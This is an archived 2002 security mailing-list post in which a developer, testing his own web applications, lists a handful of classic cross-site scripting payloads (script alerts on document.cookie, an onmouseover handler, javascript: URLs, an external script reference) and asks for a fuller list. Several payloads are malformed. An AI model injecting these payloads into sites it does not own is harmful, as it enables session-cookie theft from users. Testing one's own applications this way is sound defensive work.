OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
securityarchitect_at_hush.com
Date: Mon Dec 16 2002 - 01:54:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Maybe more for vuln-dev but I have bitten the bullet and pulled out wget and perl and am gonna start testing my apps for XSS and I need to build the ultimate list of payloads.

    For the html tags period I guess its the classic;

    <script>alert(document.cookie)</script>
    <a href="X" onmouseover="alert(document.cookie">
    <javascript ="http://www.host/script.js"
    "javascript:alert(document.cookie)"
    <iframe = c:\>
    <img src = "evil.js">

    But I seem to recall some old versions of Netscape run the { etc

    Does anyone have a good list of payloads that will cover the majority of the options ?

    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Big $$$ to be made with the HushMail Affiliate Program:
    https://www.hushmail.com/about.php?subloc=affiliate&l=427